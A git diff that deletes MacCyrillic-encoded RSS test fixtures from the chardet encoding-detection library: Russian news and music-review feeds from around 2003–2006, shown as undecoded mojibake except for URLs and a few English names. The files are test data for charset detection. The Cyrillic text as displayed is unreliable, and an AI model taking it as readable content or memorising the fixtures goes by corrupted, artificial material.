ןנוהמסעאגע ןמכםף‏ טםפמנלאצט‏ מ סמסעמםטט ןמןףכצטט מסוענמגץ. - - - -‚גוהום לוזהףםאנמהםי חאןנוע םא ‎ךסןמנע קונםמי טךנ -http://money.rin.ru/content/news/?id=106324&from=rss -‚גוהום לוזהףםאנמהםי חאןנוע םא ‎ךסןמנע קונםמי טךנ. אך ןונוהאוע "ץמ מסךג", ‎עמ נורוםטו ןנטםעמ ג †וםוגו םא חאסוהאםטט לוזהףםאנמהםמי מנדאםטחאצטט ןמ עמנדמגכו דנמחשטלט טסקוחםמגוםטול גטהאלט פכמנ ט פאףם (CITES). - - - -נמבכולא ןנמץמזהוםט דנאםטצ עףנטסעטקוסךטלט אגעמבףסאלט, סכוהף‏שטלט טח מססטט ג …גנמןף, נורוםא -http://money.rin.ru/content/news/?id=106323&from=rss -נמבכולא ןנמץמזהוםט דנאםטצ עףנטסעטקוסךטלט אגעמבףסאלט, סכוהף‏שטלט טח מססטט ג …גנמןף, נורוםא. אך סממבשטכט ג מססטיסךמל סמ‏חו עףנטםהףסענטט, ס 1 םגאנ 2006ד. ג וכמנףססטט מעלום‏עס גסו לוסעםו סבמנ ןנט ןונוסוקוםטט דנאםטצ. - - - -ףעטם ןמהןטסאכ חאךמם מ גםוסוםטט טחלוםוםטי ג ’אלמזוםםי ךמהוךס ” -http://money.rin.ru/content/news/?id=106322&from=rss -נוחטהוםע מססטט ‚כאהטלטנ ףעטם ןמהןטסאכ פוהונאכםי חאךמם " גםוסוםטט טחלוםוםטי ג סעאעט 147 ט 388 ’אלמזוםםמדמ ךמהוךסא מססטיסךמי ”והונאצטט", ןנטםעי ƒמסהףלמי 23 הוךאבנ ט מהמבנוםםי ‘מגועמל ”והונאצטט 27 הוךאבנ 2005 דמהא. - - - -"ƒ€‡" …€’ˆ‹ ‘’€‚ˆ ƒ€‡€ € “€ˆ“ -http://money.rin.ru/content/news/?id=106321&from=rss -‘ודמהם םאקטםא ס 10.00 ג סגחט ס מעךאחמל €"אפעמדאח “ךנאטם" מע ןמהןטסאםט ךמםענאךעא םא ןמסעאגךף דאחא ג 2006 דמהף, €"ƒאחןנמל" ןנוךנאעטכמ ןמסעאגךף דאחא ןמענובטעוכל “ךנאטם. ‘ממעגועסעגף‏שוו ןנוהףןנוזהוםטו בכמ מפטצטאכםמ םאןנאגכוםמ ףךנאטםסךמי סעמנמםו 31 הוךאבנ 2005 דמהא. - - - -‚גמהעס םמגו ןנאגטכא ןונוסוקוםט דנאםטצ סמ סענאםאלט אכעטט -http://money.rin.ru/content/news/?id=106320&from=rss -ˆחלוםוםט ג ןמנהךו ןונוסוקוםט דנאםטצ סמ סענאםאלט אכעטט גגמהעס ס 1 םגאנ 2006 דמהא. אך סממבשטכט ˆ€ מגמסעט ג ˆ„ מססטט, ןנט ענאםחטעו קונוח עוננטעמנט‏ ‹טעג ג אכטםטםדנאהסךף‏ מבכאסע ט טח מבכאסעט ס 2006 דמהא ןנוךנאשאועס הויסעגטו חאדנאםטקםמדמ ןאסןמנעא ‘‘‘. - - - -‘ 1 םגאנ גסעףןאוע ג סטכף חאךמם מב מסמבץ ‎ךמםמלטקוסךטץ חמםאץ -http://money.rin.ru/content/news/?id=106319&from=rss -‘ 1 םגאנ גסעףןאוע ג סטכף חאךמם מב מסמבץ ‎ךמםמלטקוסךטץ חמםאץ (‡), ןנוהףסלאענטגא‏שטי עאלמזוםםו ט םאכמדמגו כדמע הכ נוחטהוםעמג ‎עטץ חמם. ‘מדכאסםמ חאךמםא, ג מססטט בףהףע סמחהאם ‡ הגףץ עטןמג: ןנמלרכוםםמ-ןנמטחגמהסעגוםםו ט עוץםטךמ-גםוהנוםקוסךטו. - - - -”והונאכםא עאלמזוםםא סכףזבא ג 2005 דמהף -http://money.rin.ru/content/news/?id=106318&from=rss -מןמכםוםטו המץמהםמי קאסעט פוהונאכםמדמ ב‏הזועא מסעאגאכמס מהםטל טח גאזםוירטץ םאןנאגכוםטי הועוכםמסעט עאלמזוםםמי סכףזב מססטט. ‚ 2005 ד., ןמ ןנוהגאנטעוכםל האםםל, עאלמזוםםלט מנדאםאלט ןונוקטסכוםמ ג המץמה פוהונאכםמדמ ב‏הזועא 2 ענטככטמםא 102,2 לטככטאנהא נףבכוי, קעמ סמסעאגטכמ 103% מע ךמםענמכםמדמ חאהאםט. - - - -‹‏בו ןכאם ןמ ןכוקף -http://money.rin.ru/content/news/?id=106317&from=rss -‘ ץמנמרטל םאסענמוםטול גסענוקא‏ע מגי דמה עאלמזוםםטךט „אכםודמ ‚מסעמךא. „כ ‎עמדמ וסע ץמנמרטי ןמגמה - הוךאבנסךטי ןכאם ןמ סבמנף עאלמזוםםץ ןכאעוזוי גןמכםום טלט םא 115 %. ‚ פוהונאכםי ב‏הזוע ןונוקטסכוםמ 9 לכנה. - - - -מםסףכעאעטגםי סמגוע נוראוע ט םובמכרטו גמןנמס, ט ךמםצוןעףאכםו ןנמבכול -http://money.rin.ru/content/news/?id=106316&from=rss -מ סממבשוםט‏ ןנוסס-סכףזב ’“ ”, מקונוהםמו חאסוהאםטו מםסףכעאעטגםמדמ סמגועא ןמ נאבמעו ס ףקאסעםטךאלט ‚„ ןנט זםמל עאלמזוםםמל ףןנאגכוםטט סמסעמכמס ג הוךאבנו םא באחו "’אדאםנמדסךטי אגעמלמבטכםי חאגמה". - - - -מככודט ”’‘ מססטט נאססלמענוכא גמןנמס ןמהדמעמגךט כאםא הויסעגטי ןמ נואכטחאצטט מםצוןצטט נאחגטעט עאלמזוםםץ מנדאםמג מססטיסךמי ”והונאצטט -http://money.rin.ru/content/news/?id=106315&from=rss -29 הוךאבנ 2005 דמהא סמסעמכמס חאסוהאםטו ךמככודטט ”והונאכםמי עאלמזוםםמי סכףזב מססטט, םא ךמעמנמל בכט נאססלמענום גמןנמס גנאבמעךט ןכאםא לונ ןמ נואכטחאצטט מםצוןצטט נאחגטעט עאלמזוםםץ מנדאםמג מססטיסךמי ”והונאצטט םא 2006-2010 דמה, מהמבנוםםמי נאגטעוכסעגמל מססטיסךמי ”והונאצטט 8 הוךאבנ ס.ד. - - - - גסעףןכוםטט ג סטכף ןמסעאםמגכוםט נאגטעוכסעגא ” " נודףכטנמגאםטט טלןמנעא דמגהטם למנמזוםמי ג 2006 דמהף" -http://money.rin.ru/content/news/?id=106314&from=rss -‘ 1 םגאנ 2006 דמהא גסעףןאוע ג סטכף ןמסעאםמגכוםטו נאגטעוכסעגא ” N 729 מע 5.12.2005 ד. " נודףכטנמגאםטט טלןמנעא דמגהטם למנמזוםמי ג 2006 דמהף ". ‘מדכאסםמ ןמסעאםמגכוםט‏, לום‏עס םאטלוםמגאםט ענוץ ןמהסףבןמחטצטי ’ ‚„ (0202 30 100 3, 0202 30 500 3 ט 0202 30 900 3), ג ךמעמנו גךכ‏קאועס ףסכמגטו פנאםךמ-דנאםטצ סענאם גגמחא, א עאךזו ףסעאםאגכטגא‏עס םמגו סעאגךט גגמחםץ ןמרכטם סמדכאסםמ ןנטכמזוםט‏. - - - -גמע םא טלןמנע בףהףע טסןמכחמגאם ןמכםמסע‏ -http://money.rin.ru/content/news/?id=106313&from=rss -‘ 1 םגאנ גסעףןאוע ג סטכף ןמסעאםמגכוםטו נאגטעוכסעגא ” " המןמכםטעוכםץ לונאץ ןמ נודףכטנמגאםט‏ טלןמנעא דמגהטם, סגטםטם ט לסא המלארםוי ןעטצ ג 2006 - 2009 דמהאץ" (N 733 מע 5.12.2005 ד.), ןנטחגאםםמו מבוסןוקטע ןמכםמו טסןמכחמגאםטו ךגמע םא טלןמנע ןונוקטסכוםםץ גטהמג ןנמהףךצטט. - - - -‘םטזא‏עס סעאגךט ןמרכטם םא סגטםטםף -http://money.rin.ru/content/news/?id=106312&from=rss -‘ 1 םגאנ 2006 דמהא גסעףןאוע ג סטכף ןמסעאםמגכוםטו נאגטעוכסעגא ” " נודףכטנמגאםטט טלןמנעא סגטםטם ג 2006 דמהף" (N 730 מע 05.12.2005 ד.), ףסעאםאגכטגא‏שוו סףללאנםי מבתול גגמחא ג מססט‏ סגטםטם ג נאחלונו 476,1 עס. - - - -‘ןמנטע דנאלמעםמ ט ןמ הוכף -http://money.rin.ru/content/news/?id=106311&from=rss -‘ 1 םגאנ 2006 דמהא גסעףןטע ג סטכף ןנטךאח ”והונאכםמי עאלמזוםםמי סכףזב "ב מסןאנטגאםטט עאלמזוםםלט מנדאםאלט גסעףןטגרטץ ג חאךמםםף‏ סטכף סףהובםץ אךעמג אנבטענאזםץ סףהמג ג ןמנהךו םאהחמנא" (N 1080 מע 17 םמבנ 2005 דמהא). - - -
    -
    diff --git a/chardet/tests/MacCyrillic/music.peeps.ru.xml b/chardet/tests/MacCyrillic/music.peeps.ru.xml deleted file mode 100644 index 37e5a46..0000000 --- a/chardet/tests/MacCyrillic/music.peeps.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - ףחךא םא PeePs.ru: נוצוםחטט - …זוהםוגםמו לףחךאכםמו טחהאםטו - http://music.peeps.ru - - - ףחךא םא PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - ”אךע, קעמ בגרטו «וןמסוה», א םםו «Smash!» גגאכטכטס ג ךמעוכ רמף-בטחםוסא בכאדמהאנ ןמבוהו ג ןנוסעטזםמל לףחךאכםמל ךמםךףנסו, םט ךמטל מבנאחמל םו ןמחגמכוע סעאגטע טץ ג מהטם ףנמגום ס «„נףדטלט ןנאגטכאלט», «מנםלט» טכט «”אבנטךמי». ‚מ-ןונגץ, «Smash!» ןמ‏ע םא אםדכטיסךמל, גמ-געמנץ, ןמ‏ע ןנמסעמ חהמנמגמ! - - - - ‹˜€ ‘’ˆ€ 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - ‚סול עוכוחנטעוכל, א עאךזו עוכוחנטעוכםטצאל! כאדמהאנ סגמולף סבמנםטךף ט ןנמדנאללו «מכרא סעטנךא» €.אכאץמג האנטע גוסוםםוו םאסענמוםטו! א לאססמגף‏ «‘עטנךף» ןנטדכארום המלמץמחיךט €כסף ס ןוסםוי «‚קונא», ‘גועא ס ץטעמל «‚סו-עאךט למזםמ», ארא אסןףעטםא ס «‘ףלאסרוהרטל המזהול», ’אם ףכאםמגא ס ענוךמל - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ‘כמגמ benefit ס אםדכטיסךמדמ מחםאקאוע «ןמכחא», «גדמהא». “ז םו חםא‏, םא סךמכךמ גדמהםמ בכמ ןנמה‏סונאל הף‎עא מסעאגכע ןכאסעטםךף בוח םאחגאםט, םמ עמ, קעמ סטםדכ «Sex Sells» המכדמ םו סןמכחאכ ס עמן-ןמחטצטי, גםמ םו מסעאגטכמ «Benefit» ג ןנמטדנרו. - - - - "…€ …‹‡ˆ" - ‘ףןונסטלוענi - http://music.peeps.ru/news/s/2003/03/19/1429.html - ונגמו, קעמ בנמסאועס ג דכאחא - מבכמזךא הטסךא: ךכאגטרט פמנעוןטאםמ םא קונםמל פמםו - גטהטלמ, ‎עמ גנאזוםטו עמי סאלמי «סטללוענטט» ס ןנטסעאגךמי «סףןונ», מבנאחמגאםםמי ג םאחגאםטט אכבמלא. מ, קעמ עאךמו סףןונסטללוענט? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - מגי אכבמל אלונטךאםמך TLC 3D - קועגונעי ןמ סקועף ג הטסךמדנאפטט ענטמ. ‚ נוחףכעאעו ענאדטקוסךמי דטבוכט ג אגעמךאעאסענמפו מהםמי טח ףקאסעםטצ דנףןן ‹טח Left Eye ‹מןוס ענטמ ןנוגנאעטכמס ג הף‎ע. Chilli ט T-Boz נורטכט ןנמהמכזאע סמגלוסעםף‏ נאבמעף בוח ענועוי ףקאסעםטצ, םמ, וסעוסעגוםםמ, קעמ 3D ןמסגשום וו ןאלעט. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - „טהזוי ’מלוךך - לאסעונ וגנמןויסךמדמ ףנמגם, גסעףןאגרטי גלוסעו ס עאךטלט עטעאםאלט נ‎ןא, ךאך RunDMC, Wu-tang Clan, LL Cool J ט KRS-One, סהוכאגרטי נולטךס םא ןוסםט Brandy, Fugees ט האזו Jay-Z. ‚מע ט םמגי ודמ אכבמל - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - ‚ןףשוםםי ךמלןאםטוי BMG סבמנםטך כףקרטץ ןוסום ןוגצא, ךמלןמחטעמנא ט ןנמה‏סונא „טעונא מכוםא - נאהמסע הכ נמלאםעטקםץ ןמךכמםםטצ סכאהךמדמכמסמדמ םולצא. „א ט םו עמכךמ הכ םטץ: סבמנםטך םוןנטעחאעוכםמי לוכמהטקםמי ןמן-לףחךט מעכטקםמ ןמהמיהוע הכ גוקונטםמך ס עאםצאלט. - - - - נףעמ ע ןמןאכ. ”€ˆ€ ‡‚…‡„ - http://music.peeps.ru/news/s/2003/03/12/1366.html - ”אבנטקםמו ןנמטחגמהסעגמ םו סעמטע םא לוסעו, א גץמהטע םא םמגו נוכס - «חגוחהאםףעו» «ךנףעמ ןמןאכט» עוןונ םו עמכךמ םא עג-‎ךנאם, םמ ט םא ךמלןאךע-הטסך. וחףכעאע, דמגמנשטי סאל חא סוב - «פאבנטךא» טל. אעגטוםךמ נאבמעאוע סעאבטכםמ ט ןנמהףךעטגםמ. - - - - "‡גונט" - "דמכמה" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 ענוךמג הוב‏עםמדמ אכבמלא דנףןן «‡גונט» ג צוכמל מסעאגכ‏ע ןנטעםמו גןוקאעכוםטו, םמ זו גנול םו ןמךטהאוע משףשוםטו םוךמעמנמדמ מהםממבנאחט. ƒהו-עמ םא סונוהטםו ןנמסכףרטגאםט הטסךא ןמגכועס משףשוםטו, קעמ טדנאוע מהםא ט עא זו ןוסם - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ‘במנםטך The Best, גןףשוםםי פטנלמי CD Land ג 2002 דמהף, ןנוהסעאגכוע סמבמי ןמהבמנךף כףקרטץ ץטעמג דנףןן «מנאכםי מהוךס». „ףלאועס, ל‎ענ «מנאכםי מהוךס» ג מסמבמל ןנוהסעאגכוםטט םו םףזהא‏עס. - - - - '’ום - 64' - 'בנגךט פנאח' - http://music.peeps.ru/news/s/2003/02/26/1291.html - „וב‏עםי אכבמל דנףןן טח מגמדמ סךמכא «’ום - 64» ןמה םאחגאםטול «בנגךט פנאח» מעלוקום גסומבשוי במכוחם‏ למכמהץ נמססטיסךטץ ךמלאםה: גנמהו ב ט דטעאנםו סמכמ ןנטסףעסעגף‏ע, ט גמךאכ ץמנמר, ט טדנא‏ע םוןכמץמ, ט ןוסםט סמקטם‏ע ךנאסטגו. - - - - Angelight - „ועט ךואםא - http://music.peeps.ru/news/s/2003/02/23/1257.html - „מלמנמשםםו םוהמבנמזוכאעוכט לףחךט ם‏-‎יהז האגםמ ףזו מךנוסעטכט ו םףהםמי, מהםממבנאחםמי ט בוססלסכוםםמי. ˆ ‎עמ םוגחטנא םא עמ, קעמ סאלי ןמסכוהמגאעוכםי ו נמססטיסךטי אהוןע Angelight ןנוסכוהףוע ךאזהל סגמטל אכבמלמל גןמכםו ךמםךנועםו צוכט. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - מץמזו, המבטגרטס חגוחהםמדמ סעאעףסא, ט סעאג סגמודמ נמהא חאךמםמהאעוכלט זאםנא, NOFX נורטכט ןמכםמסע‏ ןמדנףחטעס ג הףנאךמגאכםטו ט סאלמןאנמהטנמגאםטו. ‹טנטךא עטןא: «She's got a silicone cock sticking in her ass  one in her cunt» טכט «there's nothing finer than having a vagina» גנהכט ןנטהועס ןמ גךףסף ףעמםקוםםל טםעוככוךעףאכאל, םמ קודמ ג ץמעוכט, ‎עמ זו גסו-עאךט ןאםך-נמך. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - נמדנוססטנף ס ךאזהל םמגל אכבמלמל NUFN ןמץמזו המסעטדכט סמגונרוםסעגא. ‚ מעכטקטו מע במכרטםסעגא מהםממבנאחםמ גוסוכץ ןמן-ןאםך דנףןן, NUFN ךכאהףע ג מסםמג סגמוי לףחךט דנףסעםו לוכמהטט, ךמעמנו ג סמקועאםטט ןנמםטךםמגוםםל גמךאכמל ט לדךטל דטעאנםל חגףךמל ןנמטחגמהע םוטחדכאהטלמו גןוקאעכוםטו. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - “האקםמ סמקועא עטןטקםמ ךאכטפמנםטיסךף‏ ןאםךמגסךף‏ לוכמהטקםמסע ס ףןנףדטל ץאנהךמנמגל חגףקאםטול (ג לףחךו) ט סמצטאכםמ-ןמכטעטקוסךף‏ עולאעטךף ס כטקםלט ןונוזטגאםטלט (ג עוךסעאץ), GR םו ג ןונגי נאח המךאחגא‏ע, קעמ גכ‏עס מהםמי טח סאלץ סטכםץ ט םוחאףנהםץ ןאםך-דנףןן 90-ץ. - - - - diff --git a/chardet/tests/MacCyrillic/newsru.com.xml b/chardet/tests/MacCyrillic/newsru.com.xml deleted file mode 100644 index bbdcab8..0000000 --- a/chardet/tests/MacCyrillic/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -מגמסעט -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ‚ ’ףנצטט ןסטץטקוסךט םוחהמנמגי לףזקטםא גחמנגאכ ץכמןףרךף ג חהאםטט טם‏סעא - http://www.newsru.com/world/03jan2006/ankara.html - ˆםצטהוםע ןנמטחמרוכ םא מהםמל טח ‎עאזוי חהאםט טם‏סעא ג €םךאנו, דהו נאסןמכמזוםמ ףןנאגכוםטו טסןמכםוםט םאךאחאםטי. ‚ ןמכטצטט ףגונ‏ע, קעמ ןנמטסרוהרוו םו גכועס עונאךעמל. ‚טםמגםטך ןנמטסרוסעגט חאהונזאם. - ‚ לטנו - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ‚ ƒˆ„„ מבושא‏ע םו רענאפמגאע ג םגאנו גמהטעוכוי חא םאנףרוםט םמגץ ןנאגטכ המנמזםמדמ הגטזוםט - http://www.newsru.com/russia/03jan2006/gibddnow.html - ‚ ןונגו םוהוכט םמגמדמ דמהא סמענףהםטךט ƒˆ„„ בףהףע כמכםמ מעםמסטעס ך גמהטעוכל, םו ףסןוגרטל גףקטע םמגו ןנאגטכא המנמזםמדמ הגטזוםט, גסעףןטגרטו ג סטכף ס 1 םגאנ 2006 דמהא. ˆםסןוךעמנאל ƒˆ„„ ןנוהןטסאםמ מבתסםטע גמהטעוכ‏ סףע םאנףרוםט ט סהוכאע ולף ןנוהףןנוזהוםטו. - ‚ מססטט - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ‚ ˆנאךו נאחבטכס אלונטךאםסךטי גמוםםי גונעמכוע: הגמו ןמדטברטץ - http://www.newsru.com/world/03jan2006/heli.html - מ האםםל טנאךסךמי ןמכטצטט, גונעמכוע ףןאכ טכט בכ סבטע גמ געמנםטך ןנטלונםמ ג 60 ךטכמלוענאץ סוגונמ-גמסעמקםוו אדהאהא. ‚ נוחףכעאעו טםצטהוםעא ןמדטבכט הגמו גמוםםמסכףזאשטץ אנלטט ‘˜€. - ‚ לטנו - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - מססטיסךטו עוםםטסטסע םוףהאקםמ סעאנעמגאכט םא ףבךו •מןלאםא - http://www.newsru.com/sport/03jan2006/hopman.html - ‘במנםא מססטט ןמ עוםםטסף ןנמטדנאכא סגמי סעאנעמגי לאעק םא ענאהטצטמםםמל םמגמדמהםול עףנםטנו ףבמך •מןלאםא ס ןנטחמגל פמםהמל לטככטמם המככאנמג ‘˜€, ךמעמני ןנמץמהטע ג אגסענאכטיסךמל דמנמהו ונע. - ‘ןמנע - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - מדאעו נמססטםךט הוכא‏ע מבמנמע ט מןנוהוכ‏ע סעטכ וגנמןויסךטץ המלמג למה - http://www.newsru.com/russia/03jan2006/women.html - נוסעםסךטו בכףח, לםמדמ לוץמג ט בנמסךטו ףךנארוםט - ג םםורםול סוחמםו במדאעו נמססטםךט הוכא‏ע מבמנמע ט מןנוהוכ‏ע סעטכ חאןאהםץ המלמג למה. ףססךטו ס ףהמגמכסעגטול גסעאגכ‏ע סגמו במדאעסעגמ םאןמךאח, ןטרוע S&#252;ddeutsche Zeitung. - ‚ מססטט - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - ‚מ ”נאםצטט ס 4 םגאנ מעלוםועס קנוחגקאיםמו ןמכמזוםטו, גגוהוםםמו ג סגחט ס לאססמגלט בוסןמנהךאלט - http://www.newsru.com/world/03jan2006/nochs.html - —נוחגקאיםמו ןמכמזוםטו בכמ גגוהוםמ גמ ”נאםצטט 8 םמבנ 2005 דמהא ףךאחמל ןנוחטהוםעא סענאם ג סגחט ס לאססמגלט בוסןמנהךאלט ג ןנטדמנמהאץ אנטזא, א 21 םמבנ ןאנכאלוםע ןנמהכטכ ודמ הויסעגטו םא ענט לוסצא. - ‚ לטנו - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ‚ ˆנאךו ‚‚‘ ‘˜€ מבסענוככט זטכמי המל: ןמדטבכא סול טח 14 קוכמגוך - http://www.newsru.com/world/03jan2006/iraq.html - מ סכמגאל ןנוהסעאגטעוכ טנאךסךטץ ןנאגממץנאםטעוכםץ מנדאםמג, מבסענוכף ס גמחהףץא ןמהגונדס זטכמי המל ג דמנמהו איהזט םא סוגונו ˆנאךא. ‘ול טח 14 קוכמגוך, םאץמהטגראס ג המלו, ןמדטבכא. ‚ נוחףכעאעו מבסענוכא ושו ענט קוכמגוךא ןמסענאהאכט, םוסךמכךטל המלאל םאםוסום ףשונב. - ‚ לטנו - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ‚ טםסךו ןמ ןמהמחנוםט‏ ג פאכרטגמלמםועםטקוסעגו חאהונזאם סם ףבטעמי זףנםאכטסעךט —ונךאסמגמי - http://www.newsru.com/crime/03jan2006/minsk.html - ‚ מעםמרוםטט סםא ףבטעמי ג ךמםצו 2004 דמהא זףנםאכטסעךט ‚ונמםטךט —ונךאסמגמי €םעמםא ”טכטלמםמגא ט ושו םוסךמכךטץ ודמ חםאךמלץ גמחבףזהוםמ ףדמכמגםמו הוכמ ןמ סע. 221 "ˆחדמעמגכוםטו, ץנאםוםטו כטבמ סבע פאכרטגץ הוםוד טכט צוםםץ בףלאד". - נטלטםאכ - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - ופעםו צום גנמסכט טח-חא דאחמגמדמ ךמםפכטךעא - http://www.newsru.com/finance/03jan2006/oil.html - –ום םא םופע םא מסםמגםץ לטנמגץ בטנזאץ גנמסכט טח-חא מחאבמקוםםמסעט ענויהונמג נמססטיסךמ-ףךנאטםסךטל דאחמגל ךמםפכטךעמל. א ‏-‰מנךסךמי NYMEX באננוכ ןמהמנמזאכ םא 2,16 המככאנא - המ 63,2 המככאנא חא באננוכ. - ךמםמלטךא - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ‚ —וכבטםסךו לוסעםי זטעוכ ענובףוע מע סףהא נאחמבנאעס, מע ךמדמ מם ןנמטחמרוכ: מע €האל ט …ג טכט מע מבוחם - http://www.newsru.com/russia/03jan2006/sered.html - †טעוכ —וכבטםסךא ‚אסטכטי ‘ונוהמםטם, גסעףןא‏שטי מעגועקטךמל ג מהםמל טח סףהובםץ ןנמצוססמג, ץמהאעאיסעגמגאכ מב מעגמהו סףהט, למעטגטנף ‎עמ עול, קעמ מבא מםט ןנמטחמרכט מע €האלא ט …ג, עמ וסע גכ‏עס נמהסעגוםםטךאלט. ם סקטעאוע, קעמ סףה המכזום ןנמסםטע ‎עמע גמןנמס. - ‚ מססטט - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - ƒנףחטם ס םמזמל אעאךמגאכ 20-לוענמגף‏ םאהףגםף‏ סמבאךף םא דכאגםמי ןכמשאהט ‡ףדהטהט (”’) - http://www.newsru.com/world/03jan2006/knifer.html - ’ולףנ מבאכט םוסךמכךמ נאח ןנמעךםףכ סמבאךף םמזמל, ןמסכו קודמ בכ חאהונזאם ןמכטצטוי. ם םו סלמד האע גםעםמדמ מבתסםוםט סגמולף ןמסעףןךף. …לף דנמחטע ענט דמהא ע‏נל. - ‚ לטנו - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ‚ אטנו מבנףרטכטס םוסךמכךמ זטכץ המלמג: ןמדטבכט 3 קוכמגוךא, 4 ןמכףקטכט נאםוםט - http://www.newsru.com/world/03jan2006/cairo.html - ˆח-חא מבנףרוםט רוסעט- ט ענוץ‎עאזםמדמ זטכץ המלמג ג סעמכטצו …דטןעא חאגאכאלט מךאחאכס ןונוךנע ןמהתוחה הכ עוץםטךט. נטקטםמי מבנףרוםט המלמג סעאכמ עמ, קעמ לוסעםו זטעוכט סענמע טץ טח סאלמהוכםמדמ ךטנןטקא, טחדמעמגכוםםמדמ טח ןנוססמגאםםמדמ לףסמנא. - ‚ לטנו - Tue, 3 Jan 2006 14:37:00 +0300 - - - - - מססטםו םאחגאכט סאלו טםעונוסםו פטכל, ךםטדט, זףנםאכ ט עוכוןונוהאקט ג 2005 דמהף - http://www.newsru.com/cinema/03jan2006/best.html - “קאסעםטךט מןנמסא, ןנמגוהוםםמדמ €םאכטעטקוסךטל צוםענמל נט ‹וגאה, ןמןעאכטס םאחגאע סאלי טםעונוסםי פטכל, ךםטדף, עוכוןנמדנאללף ט זףנםאכ. נטלוקאעוכםמ, קעמ מסםמגםמי מעגוע םא גסו 4 גמןנמסא - "חאענףהם‏ס מעגועטע". - ףכעףנא - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ‚ םמגמל דמהף םא ‘ למדףע מעלוםטע "סףץמי חאךמם" - http://www.newsru.com/russia/03jan2006/mks.html - -“זו ןע כוע ס למלוםעא, ךמדהא ‘ סעאכא מבטעאולמי, םא םוי הויסעגףוע זוסעמקאירטי חאןנוע םא אכךמדמכ. מ סכףץאל, ןונגל ןמסכאבכוםטול סעאכא המסעאגךא םא במנע רמךמכאהםץ ךמםפוע ס כטךונמל. מ האזו ‎עמ מפטצטאכםמ ןמהעגונהטע םוגמחלמזםמ, גוה םאנףרטעוכל דנמחטע םולוהכוםםמו ףגמכםוםטו. - ‚ מססטט - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: “סאלא בום ‹אהום ףזו 3 דמהא זטגוע ג ˆחנאטכו - http://www.newsru.com/world/03jan2006/laden.html - -ƒנאזהאםטם €פדאםטסעאםא “סאלא בום ‹אהום גתוץאכ ג ˆחנאטכ ןמ עףנטסעטקוסךמי גטחו קונוח דמה ט ענט הם ןמסכו עונאךעמג 11 סוםעבנ 2001 דמהא ג ‘˜€, ןונוה אלונטךאםסךטל געמנזוםטול ג ˆנאך. …דמ גוחה טח ˆחנאטכ םו בכ חאפטךסטנמגאם. - ‚ לטנו - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - מססטםו םאחגאכט סאלץ ףלםץ, סלוכץ ט סוךסףאכםץ ןמכטעטךמג סענאם - http://www.newsru.com/russia/03jan2006/politics.html - €םאכטעטקוסךטי צוםענ נט ‹וגאה ןנמגוכ מןנמס סנוהט נמססטם ג ךמםצו 2005 דמהא. וסןמםהוםע מעגועטכט םא גמןנמס מ סאלץ קוסעםץ, סלוכץ, ףלםץ ט סוךסףאכםץ ןמכטעטךאץ. ˆלט סעאכט ףעטם ט †טנטםמגסךטי. נמלו עמדמ, נמססטםו םאחגאכט מלאםא €בנאלמגטקא סאלל במדאעל קוכמגוךמל סענאם. - ‚ מססטט - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ‚ Windows םאיהוםא מןאסםא ףחגטלמסע, ףדנמזא‏שא ןמקעט גסול ךמלן‏עונאל םא ןכאםועו - http://www.newsru.com/world/03jan2006/windows.html - ‹‏במי טח לטככטמםמג ךמלן‏עונמג ןמה ףןנאגכוםטול ‘ Windows למזוע בע אעאךמגאם ןנלמ סויקאס, ןטרוע דאחועא Financial Times. €עאךא ןנמטסץמהטע ןףעול גםוסוםט גנוהמםמסםמדמ ךמהא ג מבקםף‏ ךאנעטםךף. עמ לםמדמךנאעםמ ףגוכטקטגאוע מןאסםמסע חאנאזוםט. נמלו עמדמ, Microsoft ןמךא םו גןףסעטכא טסןנאגכוםטו, חאךנגא‏שוו "הנף". - ‚ לטנו - Tue, 3 Jan 2006 12:25:00 +0300 - - - - - - - Die Presse: ףעטם - גכאסעוכטם דמכףבמדמ מדם - http://www.newsru.com/russia/03jan2006/putingas.html - "ƒאחןנמל" &#8211; ‎עמ דכאגםמו מנףזטו ףעטםא ג במנבו חא גכטםטו ט גכאסע. ‘ עוץ ןמנ ךאך "ƒאחןנמל" ןנטמסעאםמגטכ סםאבזוםטו “ךנאטם ןנטנמהםל דאחמל, זטחם ג צוםענאכםמי הטסןועקונסךמי למםמןמכטט, םוסלמענ םא םמגמדמהםטו ןנאחהםטךט, בוע ךכ‏קמל. - ‚ מססטט - Tue, 3 Jan 2006 12:13:00 +0300 - - - - - - - ˆח ןףםךעא מבלוםא גאכ‏ע ג מסךגו ןמץטשוםמ 35 